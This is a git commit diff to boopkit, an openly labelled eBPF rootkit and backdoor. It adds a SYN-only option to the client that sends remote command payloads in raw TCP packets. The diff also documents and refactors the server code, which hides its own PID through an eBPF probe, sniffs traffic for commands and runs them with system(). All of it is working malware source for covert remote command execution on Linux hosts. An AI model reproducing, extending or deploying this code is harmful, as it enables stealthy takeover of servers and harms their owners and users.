Automatic commit from github.com/kris-nova/bin/git-save

Signed-off-by: Kris Nóva <[email protected]>

boop/boopkit-boop.c

@@ -47,18 +47,20 @@ void usage() {
   boopprintf("-lport             Local  (src) port      : 3535\n");
   boopprintf("-rhost             Remote (dst) address   : 127.0.0.1.\n");
   boopprintf("-rport             Remote (dst) port      : 22\n");
-  boopprintf(
-      "-9, halt/kill      Halt or kill the boopkit malware on a server.\n");
+  boopprintf("-9, halt/kill      Kill the boopkit malware on a server.\n");
+  boopprintf("-c, command        Remote command to exec : ls -la\n");
+  boopprintf("-h, help           Print help and usage.\n");
   boopprintf("-q, quiet          Disable output.\n");
-  boopprintf("-c, execute        Remote command to exec : ls -la\n");
   boopprintf("-r, reverse-conn   Serve the RCE on lhost:lport after a boop.\n");
-  boopprintf("-h, help           Print help and usage.\n");
+  boopprintf("-x, syn-only       Send a single SYN packet with RCE payload.\n");
   boopprintf("\n");
   exit(0);
 }
 
-// config is the configuration options for the program
-struct config {
+/**
+ * config is the CLI options that are used throughout boopkit
+ */
+ struct config {
   // metasploit inspired flags
   char rhost[INET_ADDRSTRLEN];
   char rport[MAX_ARG_LEN];
@@ -67,18 +69,24 @@ struct config {
   char rce[MAX_RCE_SIZE];
   int halt;
   int reverseconn;
+  int synonly;
 } cfg;
 
-// clisetup will initialize the config struct for the program
+/**
+ * clisetup is used to initalize the program from the command line
+ * 
+ * @param argc 
+ * @param argv 
+ */
 void clisetup(int argc, char **argv) {
-  // Default values
   strncpy(cfg.lhost, "127.0.0.1", INET_ADDRSTRLEN);
   sprintf(cfg.lport, "%d", PORT);
   strncpy(cfg.rhost, "127.0.0.1", INET_ADDRSTRLEN);
   strncpy(cfg.rport, "22", MAX_ARG_LEN);
   strncpy(cfg.rce, "ls -la", MAX_RCE_SIZE);
   cfg.halt = 0;
   cfg.reverseconn = 0;
+  cfg.synonly = 0;
   for (int i = 0; i < argc; i++) {
     if (strncmp(argv[i], "-lport", 32) == 0 && argc >= i + 1) {
       strncpy(cfg.lport, argv[i + 1], MAX_ARG_LEN);
@@ -106,6 +114,9 @@ void clisetup(int argc, char **argv) {
         case 'r':
           cfg.reverseconn = 1;
           break;
+        case 'x':
+          cfg.synonly = 1;
+          break;
         case '9':
           cfg.halt = 1;
           break;
@@ -114,7 +125,15 @@ void clisetup(int argc, char **argv) {
   }
 }
 
-void rootcheck(int argc, char **argv) {
+/**
+ * uid_check is used to check the runtime construct of boopkit
+ *
+ * Ideally boopkit is ran without sudo as uid=0 (root)
+ *
+ * @param argc
+ * @param argv
+ */
+void uid_check(int argc, char **argv) {
   long luid = (long)getuid();
   if (luid != 0) {
     boopprintf("  XX Invalid UID.\n");
@@ -123,6 +142,16 @@ void rootcheck(int argc, char **argv) {
   }
 }
 
+/**
+ * serverce is a last resort attempt to serve an RCE from a
+ * boopkit-boop client.
+ *
+ * This can be opted-in by passing -r to boopkit.
+ *
+ * @param listenstr
+ * @param rce
+ * @return
+ */
 int serverce(char listenstr[INET_ADDRSTRLEN], char *rce) {
   struct sockaddr_in laddr;
   int one = 1;
@@ -163,15 +192,21 @@ int serverce(char listenstr[INET_ADDRSTRLEN], char *rce) {
   return 0;
 }
 
+/**
+ * main
+ *
+ * @param argc
+ * @param argv
+ * @return
+ */
 int main(int argc, char **argv) {
   int one = 1;
   const int *oneval = &one;
   clisetup(argc, argv);
   asciiheader();
-  rootcheck(argc, argv);
+  uid_check(argc, argv);
   srand(time(NULL));
 
-  // [Destination]
   // Configure daddr fields sin_port, sin_addr, sin_family
   struct sockaddr_in daddr;
   daddr.sin_family = AF_INET;
@@ -181,7 +216,6 @@ int main(int argc, char **argv) {
     return 1;
   }
 
-  // [Source]
   // Configure saddr fields, sin_port, sin_addr, sin_family
   struct sockaddr_in saddr;
   saddr.sin_family = AF_INET;
@@ -197,7 +231,6 @@ int main(int argc, char **argv) {
   inet_ntop(AF_INET, &daddr.sin_addr, daddrstr, sizeof daddrstr);
   inet_ntop(AF_INET, &saddr.sin_addr, saddrstr, sizeof saddrstr);
 
-  // Calculate RCE
   char *packet;
   char payload[MAX_RCE_SIZE];
   if (cfg.halt) {
@@ -252,6 +285,9 @@ int main(int argc, char **argv) {
   close(sock1);
   // ===========================================================================
 
+  if (cfg.synonly){
+    return 0;
+  }
 
   // ===========================================================================
   // 2. TCP SOCK_STREAM Connection

boopkit.c

@@ -123,6 +123,9 @@ int recvrce(char dial[INET_ADDRSTRLEN], char *rce) {
   return 1;
 }
 
+/**
+ * config is the CLI options that are used throughout boopkit
+ */
 struct config {
   int sudobypass;
   char pr0besafepath[PATH_MAX];
@@ -134,6 +137,12 @@ struct config {
   char deny[MAX_DENY_ADDRS][INET_ADDRSTRLEN];
 } cfg;
 
+/**
+ * clisetup is used to initalize the program from the command line
+ * 
+ * @param argc 
+ * @param argv 
+ */
 void clisetup(int argc, char **argv) {
   cfg.denyc = 0;
   cfg.reverseconn = 0;
@@ -175,18 +184,37 @@ void clisetup(int argc, char **argv) {
   }
 }
 
+/**
+ * Shared memory with the kernel
+ */
 static struct env {
   int pid_to_hide;
   int target_ppid;
 } env;
 
-// handlepidlookup is called everytime the kernel searches for our pid.
-static int handlepidlookup(void *ctx, void *data, size_t data_sz) {
+/**
+ * cb_pid_lookup is a callback function for PID lookup at runtime
+ * used in obfuscating boopkit from the rest of the kernel.
+ * 
+ * @param ctx 
+ * @param data 
+ * @param data_sz 
+ * @return 
+ */
+static int cb_pid_lookup(void *ctx, void *data, size_t data_sz) {
   // const struct event *e = data;
   return 0;
 }
 
-void rootcheck(int argc, char **argv) {
+/**
+ * uid_check is used to check the runtime construct of boopkit
+ *
+ * Ideally boopkit is ran without sudo as uid=0 (root)
+ *
+ * @param argc 
+ * @param argv 
+ */
+void uid_check(int argc, char **argv) {
   long luid = (long)getuid();
   if (luid != 0) {
     boopprintf("  XX Invalid UID.\n");
@@ -217,54 +245,60 @@ void rootcheck(int argc, char **argv) {
   boopprintf("  -> getppid()               : %ld\n", lppid);
 }
 
+/**
+ * exec is where the magic happens.
+ *
+ * @param rce
+ * @return
+ */
 int exec(char *rce) {
   char *ret;
   ret = strstr(rce, BOOPKIT_RCE_CMD_HALT);
   if (ret) {
-    // Halt!
     runtime__xcap    = 0; // Stop the xcap loop
     runtime__boopkit = 0; // Stop the boopkit loop
     boopprintf("  XX Halting boopkit: %s\n", ret);
     free(rce);
     return 0;
   }
   boopprintf("  <- Executing: %s\n", rce);
-  system(rce);
+  system(rce); // :)
   free(rce);
   return 1;
 }
 
+/**
+ * main
+ *
+ * @param argc
+ * @param argv
+ * @return
+ */
 int main(int argc, char **argv) {
   clisetup(argc, argv);
   asciiheader();
-  rootcheck(argc, argv);
+  uid_check(argc, argv);
   boopprintf("  -> Logs                    : /sys/kernel/tracing/trace_pipe\n");
 
-  int loaded, err;
-  struct bpf_object *bpobj;
-  struct pr0be_safe *sfobj;
+  int    loaded, err;
+  struct bpf_object  *bpobj;
+  struct pr0be_safe  *sfobj;
   struct bpf_program *progboop = NULL;
   struct ring_buffer *rb = NULL;
-  char pid[16];
+  char   pid[16];
 
-  // ===========================================================================
-  // [xcap]
   {
     // Start a new thread for DPI. @zomgwtfbbqkewl
     pthread_t th;
     pthread_create(&th, NULL, xcap, (void *)cfg.dev_name);
   }
-  // ===========================================================================
 
   // ===========================================================================
   // [pr0be.safe.o]
   {
     boopprintf("  -> Loading eBPF Probe      : %s\n", cfg.pr0besafepath);
     sfobj = pr0be_safe__open();
     // getpid()
-    //
-    // Note: We know that we can use getpid() as the rootcheck() function above
-    //       will manage ensuring we are executing this program without sudo
     env.pid_to_hide = getpid();
     sprintf(pid, "%d", env.pid_to_hide);
     strncpy(sfobj->rodata->pid_to_hide, pid,
@@ -301,7 +335,7 @@ int main(int argc, char **argv) {
       boopprintf("Failed to attach %s\n", cfg.pr0besafepath);
       return 1;
     }
-    rb = ring_buffer__new(bpf_map__fd(sfobj->maps.rb), handlepidlookup, NULL,
+    rb = ring_buffer__new(bpf_map__fd(sfobj->maps.rb), cb_pid_lookup, NULL,
                           NULL);
     if (!rb) {
       boopprintf("Failed to create ring buffer\n");
@@ -378,7 +412,6 @@ int main(int argc, char **argv) {
       inet_ntop(AF_INET, &saddrbytes, saddrval, sizeof(saddrval));
       boopprintf("  ** Boop source: %s\n", saddrval);
 
-
       // Filter boop addrs
       ignore = 0;
       for (int i = 0; i < cfg.denyc; i++) {
@@ -402,7 +435,7 @@ int main(int argc, char **argv) {
       // Always check for RCE in the ring buffer.
       char *rce = malloc(MAX_RCE_SIZE);
       int xcap_found;
-      // Check the packet buffer for the value to execute.
+
       xcap_found = xcaprce(saddrval, rce);
       if (xcap_found == 1) {
         exec(rce);

dpi.h

@@ -27,6 +27,7 @@
 #define XCAP_BUFFER_SIZE 64
 
 extern int runtime__xcap;
+
 typedef struct xcap_ip_packet {
   int captured;
   struct ip *iph;